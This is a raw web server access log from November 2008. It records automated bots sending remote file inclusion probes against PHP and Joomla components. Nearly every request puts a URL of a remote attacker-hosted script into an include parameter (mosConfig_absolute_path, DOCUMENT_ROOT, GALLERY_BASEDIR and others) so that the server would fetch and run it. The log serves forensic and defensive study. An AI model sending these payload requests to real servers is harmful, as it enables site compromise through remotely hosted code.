154.5.252.194 - - [10/Nov/2008:09:21:27 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
154.5.252.194 - - [10/Nov/2008:09:21:27 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
154.5.252.194 - - [10/Nov/2008:09:21:28 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
154.5.252.194 - - [10/Nov/2008:09:21:28 -0800] "GET /logs/access_080612.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:21:32 -0800] "GET /logs/access_080918.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:21:33 -0800] "GET /logs/access_080116.log%20%20//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:21:33 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:21:33 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:21:33 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:21:34 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 200 94786 "-" "libwww-perl/5.805" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:21:35 -0800] "GET /logs/access_080918.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:21:40 -0800] "GET /logs/access_080424.log/index2.php?x=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:21:40 -0800] "GET /logs/access_080526.log/index2.php?x=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:21:41 -0800] "GET /logs/access_080116.log%20%20//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:21:44 -0800] "GET /logs/access_080811.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:21:45 -0800] "GET /logs/access_080811.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:22:02 -0800] "GET /logs/access_080408.log/pages.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:22:02 -0800] "GET /pages.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:22:02 -0800] "GET /logs/pages.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:22:10 -0800] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:22:10 -0800] "GET /logs/access_080606.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:22:16 -0800] "GET /logs/access_071204.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:22:16 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:22:20 -0800] "GET /logs/access_080331.log/?_zb_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:22:21 -0800] "GET /?_zb_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 200 94604 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:22:23 -0800] "GET /logs/?_zb_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 200 73021 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:22:40 -0800] "GET /pages.php?page=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:22:40 -0800] "GET /logs/access_080408.log/pages.php?page=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:22:40 -0800] "GET /logs/pages.php?page=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:22:45 -0800] "GET /logs/access_080331.log//?_zb_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.16 - - [10/Nov/2008:09:22:48 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [10/Nov/2008:09:22:48 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:22:54 -0800] "GET /logs/access_071204.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:22:57 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:22:57 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.149 - - [10/Nov/2008:09:23:11 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.84.215 - - [10/Nov/2008:09:23:31 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://controlloid.altervista.org/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:23:36 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:23:43 -0800] "GET /logs/access_080516.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.72.255 - - [10/Nov/2008:09:23:49 -0800] "GET /logs/access_080203.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
84.234.72.255 - - [10/Nov/2008:09:23:49 -0800] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
64.27.13.94 - - [10/Nov/2008:09:23:55 -0800] "GET /logs/access_080619.log HTTP/1.1" 200 1835008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:09:23:56 -0800] "GET /logs/access_080805.log///vwar/backup/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:09:24:05 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:09:24:05 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:09:24:06 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:24:15 -0800] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:24:15 -0800] "GET /logs/access_080203.log/joomla/index.php?option=com_restaurante&task=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.246.154.68 - - [10/Nov/2008:09:24:20 -0800] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [10/Nov/2008:09:24:20 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:24:34 -0800] "GET /logs//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:24:34 -0800] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:24:35 -0800] "GET /logs/access_080918.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:24:35 -0800] "GET /logs/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 73021 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:24:35 -0800] "GET /logs//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:24:35 -0800] "GET /?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94809 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:24:35 -0800] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:24:37 -0800] "GET /logs/access_080918.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:24:37 -0800] "GET /logs/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 73021 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:24:38 -0800] "GET /?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94793 "-" "Mozilla/5.0" "www.dmulk.com"
89.248.166.200 - - [10/Nov/2008:09:24:38 -0800] "GET /logs/access_080918.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.248.166.200 - - [10/Nov/2008:09:24:38 -0800] "GET /logs/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 73021 "-" "Mozilla/5.0" "www.dmulk.com"
89.248.166.200 - - [10/Nov/2008:09:24:38 -0800] "GET /?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94793 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:24:39 -0800] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:09:24:47 -0800] "GET /index.php?page=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 200 94665 "-" "libwww-perl/5.810" "www.dmulk.com"
89.248.166.200 - - [10/Nov/2008:09:24:47 -0800] "GET /logs/access_080811.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:25:08 -0800] "GET /logs/access_071222.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:25:08 -0800] "GET /logs/access_080303.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:25:08 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:25:08 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:25:15 -0800] "GET /logs/access_080811.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:25:15 -0800] "GET /logs/access_080811.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.241.74 - - [10/Nov/2008:09:25:17 -0800] "GET /logs/access_080209.log/index.php?lang=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.192.241.74 - - [10/Nov/2008:09:25:18 -0800] "GET /index.php?lang=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 200 94625 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.192.241.74 - - [10/Nov/2008:09:25:25 -0800] "GET /logs/access_080209.log/index.php?lang=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:25:25 -0800] "GET /logs/errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:25:25 -0800] "GET /errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:25:25 -0800] "GET /logs/access_080127.log/errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
91.192.241.74 - - [10/Nov/2008:09:25:26 -0800] "GET /index.php?lang=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 200 94625 "-" "libwww-perl/5.64" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:25:26 -0800] "GET /logs/access_080127.log/errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:25:26 -0800] "GET /logs/errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:25:26 -0800] "GET /errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
91.192.241.74 - - [10/Nov/2008:09:25:26 -0800] "GET /logs/index.php?lang=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
218.38.16.107 - - [10/Nov/2008:09:25:29 -0800] "GET /logs/access_080620.log//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:25:41 -0800] "GET /logs/access_080730.log/errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:25:46 -0800] "GET /logs/access_080730.log/errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:25:54 -0800] "GET /logs/access_080130.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:25:54 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:25:55 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:25:55 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:26:07 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.69.44.43 - - [10/Nov/2008:09:26:15 -0800] "GET /logs/access_080717.log HTTP/1.1" 200 1835008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:26:19 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:26:20 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:26:27 -0800] "GET /logs/access_080209.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:26:28 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:26:44 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:26:44 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:26:51 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:26:51 -0800] "GET /logs/access_071222.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:26:51 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:26:55 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:09:26:57 -0800] "GET /logs/access_080927.log/lostpasswd.php?env[include_prefix]=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:26:58 -0800] "GET /logs/access_080303.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
154.5.252.194 - - [10/Nov/2008:09:27:26 -0800] "GET /logs/access_080612.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
154.5.252.194 - - [10/Nov/2008:09:27:26 -0800] "GET /logs/access_080118.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.207.81.134 - - [10/Nov/2008:09:27:27 -0800] "GET /logs/access_080730.log///vwar/backup/errors.php?error=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.207.81.134 - - [10/Nov/2008:09:27:28 -0800] "GET //vwar/backup/errors.php?error=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.26 - - [10/Nov/2008:09:27:28 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.207.81.134 - - [10/Nov/2008:09:27:28 -0800] "GET /logs///vwar/backup/errors.php?error=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.71.148 - - [10/Nov/2008:09:27:47 -0800] "GET /logs/access_071204.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.71.148 - - [10/Nov/2008:09:27:48 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.71.148 - - [10/Nov/2008:09:27:48 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:28:01 -0800] "GET /logs/access_080914.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
